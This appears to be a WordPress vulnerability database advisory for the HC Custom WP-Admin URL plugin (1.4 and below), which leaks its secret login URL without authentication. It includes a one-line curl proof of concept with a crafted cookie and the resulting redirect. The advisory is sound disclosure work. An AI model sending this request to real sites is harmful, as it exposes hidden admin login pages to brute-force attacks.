WordPress Plugin Vulnerabilities
HC Custom WP-Admin URL <= 1.4 - Unauthenticated Secret URL Disclosure
Description
The plugin leaks the secret login URL when sending a specific crafted request
Proof of Concept
curl -sIXGET -H "Cookie: valid_login_slug=1" https://example.com/wp-login.php HTTP/2 302 x-redirect-by: WordPress location: secret
Affects Plugins
References
CVE
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-18 (about 2 years ago)
Added
2022-05-18 (about 2 years ago)
Last Updated
2023-02-10 (about 1 years ago)